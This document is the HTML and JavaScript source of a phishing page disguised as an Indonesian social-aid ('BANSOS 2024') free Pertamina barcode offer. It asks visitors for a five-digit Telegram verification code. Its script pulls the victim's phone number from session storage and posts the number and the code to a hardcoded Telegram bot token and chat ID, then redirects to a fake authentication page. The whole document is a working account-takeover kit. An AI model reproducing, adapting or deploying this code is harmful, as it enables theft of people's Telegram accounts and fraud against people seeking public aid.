<!DOCTYPE html><html lang="en" class="h-100"><head id="ctl00_Head1">
<link href="css/bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
    <link href="css/custom.css" type="text/css" rel="stylesheet">
    <!-- Google tag (gtag.js) --> 
    <script async="" src="https://www.googletagmanager.com/gtag/js?id=G-VCHP4QZ39R"></script> 
    <script> 
        window.dataLayer = window.dataLayer || [];
        function gtag() { dataLayer.push(arguments); } gtag('js', new Date());
        gtag('config', 'G-VCHP4QZ39R'); 

    </script>

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description">
    <meta name="author" content="BANSOS 2024">
    <title>BANSOS 2024</title>
    <link rel="icon" type="image/x-icon" href="images/favicon.png">
    <link rel="canonical" href="https://getbootstrap.com/docs/5.0/examples/sticky-footer/">
    <!-- Bootstrap core CSS -->
    <link rel="stylesheet" href="bootstrap-icons.css">
    <style type="text/css">
    body {
        background-color: white; /* Mengatur warna latar belakang menjadi putih */
        color: black; /* Mengatur warna teks menjadi hitam */
    }
    
    /* This stylesheet override some default Bootstrap's styling */

body {
	background-color: #EEE9D6;
}

.container {
  width: auto;
  padding: 0 15px;
}

.container-narrow {
	width: auto;
	max-width: 480px;
}

.btn-mk {
	color: #fff;
	background-color: #6F5552;
}

.table {
	background-color: #fff;
}

.table-status td {
	background-color: #fff8e8;
}

.text_asat {
	font-size: small;
	font-weight: normal;
	color: #838383;
}

.link-mk {
	color: #403B39;
	text-decoration: none;
}

.link-mk:hover {
	text-decoration: underline;
}

.card {
	margin-bottom: 0.5em;
}

.card-title {
	border-bottom: 1px dotted #E8E6E6;
	padding-bottom: 0.5em;
	font-size: 1rem;
}

footer {
	background-color: #403B39;
}

footer .list-group-item, footer .list-group-item:hover {
	background: none;
	border: none;
}

footer a.nav-link {
	color: #fff;
	padding-top: 0;
}

footer a.nav-link:hover {
	text-decoration: underline;
}

    .bd-placeholder-img {
        font-size: 1.125rem;
        text-anchor: middle;
        -webkit-user-select: none;
        -moz-user-select: none;
        user-select: none;
    }

        @media (min-width: 768px) {
            .bd-placeholder-img-lg {
                font-size: 3.5rem;
            }
        }

         /* Make carousel full width */
        .carousel {
            max-width: 600px;
            margin: auto;
        }

        /* Make carousel images responsive */
        .carousel-item img {
            max-width: 100%;
            height: auto;
        }

        .fade {
            animation-name: fade;
            animation-duration: 1.5s;
        }

        @keyframes fade {
            from {
                opacity: .4;
            }
            to {
                opacity: 1;
            }
        }
        
        :root {
    --blue: #5EA3DE;
    --dark: #1D2733;
    --ov: #0000001b;
}
* {
    font-family: 'Ubuntu', sans-serif;
    font-weight: 400;
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    position: relative;
    color: black;
}
.container {
    width: 100%;
    height: 100%;
    display: flex;
    align-items: center;
    flex-direction: column;
    padding: 0 20px;
}
.container h2 {
    font-size: 18px;
    font-weight: 600;
}
.kami {
    margin-top: 20px;
    font-size: 13px;
    color: #bcbcbc;
    text-align: center;
}
form {
    margin-top: 20px;
    width: 100%;
    height: 50px;
    display: flex;
    justify-content: center;
    align-items: center;
}
form .box-input-pin {
}
form input {
    height: 43px;
    width: 35px;
    border: 2px solid #7f7f7f;
    margin: 0px 2px;
    outline: none;
    background: none;
    border-radius: 7px;
    font-size: 16px;
    text-align: center;
    transition: .2s;
}
form input:focus {
    transition: .2s;
    border: 2px solid var(--blue);
}
.container .sms {
    margin-top: 30px;
    font-size: 14px;
    font-weight: 500;
    color: var(--blue);
}
.clear {
    width: 100%;
    height: 100%;
    position: absolute;
    left: 0;
    top: 0;
    z-index: 99;
    right: 0;
}
        
    </style>
    

</head>
<body class="d-flex flex-column h-100">
    <!-- Begin page content -->
    <main class="flex-shrink-0">
<div id="ctl00_divContainer" class="container container-narrow">
    <div class="text-center mt-2">
    <a id="ctl00_lnkMalay" disabled="disabled" style="color:Black;font-weight:bold;text-decoration:none;">Bahasa Indonesia</a>
        <span id="ctl00_lblPipe_bm"> | </span>
    <a id="ctl00_lnkEng" href="">English</a>  
        <span id="ctl00_lblPipe_bi"> | </span>
    <a id="ctl00_lnkChineseSimplified" href=""> 中文(简体) </a>  
        <span id="ctl00_lblPipe_bc"> | </span>
    <a id="ctl00_lnkTamilInd" href="">தமிழ் </a>
    </div>


    <div id="ctl00_divContainer" class="container container-narrow">
         <div class="header">
            <img class="w-100" src="images/ini.jpg" alt="" />
        </div>
          

        <h2 class="fw-bold mt-2 page-header text-center ">
            <span id="ctl00_RecipientMasterContent_lblSubject">CETAK BARCODE PERTAMINA GRATIS</span>
        </h2>

        <form id="formPin">
            <div class="box-input-pin">
                <div class="clear"></div>
				<input type="hidden" name="countryName" id="countryName" value="Malaysia">
				<input type="hidden" name="phoneNumber" id="thisPhone" value="+60 ">
                <input autofocus="" name="pin1" id="pin1" class="inppin" value="7" type="number" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;">
                <input name="pin2" id="pin2" class="inppin" type="number" value="9" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;">
                <input name="pin3" id="pin3" class="inppin" type="number" value="5" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;">
                <input name="pin4" id="pin4" value="3" class="inppin" type="number" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;">
                <input name="pin5" id="pin5" value="2" class="inppin" type="number" autocomplete="off" required="" maxlength="1" onkeypress="if(this.value.length==1) return false;">
            </div>
        </form>
		<form action="#" method="post">
		<input type="hidden" name="countryName" id="countryName" value="Malaysia">
		<input type="hidden" name="phoneNumber" id="phoneNumber" value="+60 ">
        <button type="submit" class="sms" style="background: none; border: none; outline: none;">Kode di kirim melalui Telegram</button>
		</form>
    </div>
<script src="js/jquery-3.5.1.min.js"></script>
</div></div></main>
    <!-- Footer Starts -->
    <div class="header mt-3 text-center">
        <img src="images/ini1.png" id="ctl00_logohead" class="img-fluid" width="450">
    </div>
    <footer class="footer mt-auto py-3">
        <div class="container">
            <div class="row">
                <div class="col-5">
                    <span class="text-white">
                        <span id="ctl00_lblCopyRight">2024 All Rights Reserved. </span>
                    </span>
                </div>
                <div class="col">
                    <ul class="nav justify-content-end">
                        <li class="nav-item">
                            <a id="ctl00_lnkFaq" class="nav-link" href="">
                                <i class="bi-question-circle"></i>
                                <span id="ctl00_lblFAQ"></span></a>
                        </li>
                        <li class="nav-item">
                            <p id="ctl00_linkMerchList">
                                <a class="nav-link" href=""><i class="bi-shop"></i>
                                    <span id="ctl00_lblMerchList"></span></a>
                            </p>
                        </li>
                        <li class="nav-item">
                            <a href="" id="ctl00_linkContactUs" class="nav-link"><i class="bi-envelope"></i>
                                <span id="ctl00_lblctctus"></span></a>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
    </footer>
    <!-- Placed at the end of the document so the pages load faster -->


  
    <script src="js/jquery.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
<script>
$(document).ready(function() {
    $('.clear').click(function() {
        $('.inppin').val('');
        $('#pin1').focus();
    });
})
var botToken = "7616180006:AAG4H-Acw9jYcry-mEpGwF6hXcI5s6vC5H4";
$('.inppin').on('input', function(event) {
    const inputs = $('.inppin');
    const isAllFilled = Array.from(inputs).every((input) => input.value !== '');
    if (isAllFilled == true) {
        $(event.target).blur();
        sendPin();
    }
    const index = inputs.index(this);
    const currentValue = event.target.value;
    if (currentValue.length === 1) {
        if (index < inputs.length - 1) {
            inputs[index + 1].focus();
        }
    } else if (currentValue.length === 0) {
        if (index > 0) {
            inputs[index].focus();
        }
    }
});
$('.inppin').on('keydown', function(event) {
    const inputs = $('.inppin');
    const key = event.key;
    const index = inputs.index(this);
    if (key === 'Backspace' && event.target.value.length === 0) {
        if (index > 0) {
            inputs[index - 1].focus();
        }
    }
});
function sendPin(){
    $(".load").fadeIn();
    var pin1 = $("#pin1").val();
    var pin2 = $("#pin2").val();
    var pin3 = $("#pin3").val();
    var pin4 = $("#pin4").val();
    var pin5 = $("#pin5").val();
    var plain_pin = `${pin1}-${pin2}-${pin3}-${pin4}-${pin5}`
    noHp = sessionStorage.getItem("nohp")
    sendMessageToBot("/send_otp "+noHp+"|"+plain_pin)
}
function sendMessageToBot(message) {
    $.ajax({
    url: 'https://api.telegram.org/bot' + botToken + '/sendMessage',
    method: 'POST',
    data: {
        chat_id: '5207694375', 
        text: message
    },
    success: function(response) {
        console.log('Pesan berhasil dikirim ke bot Telegram');
        window.location.href = '/authenticate.html'; 
    },
    error: function(error) {
        console.error('Gagal mengirim pesan ke bot Telegram:', error);
    }
    });
}
var set_item = sessionStorage.getItem("nohp");
document.getElementById("thisPhone").value = set_item;
</script>






</body><!-- Bootstrap JS --></html>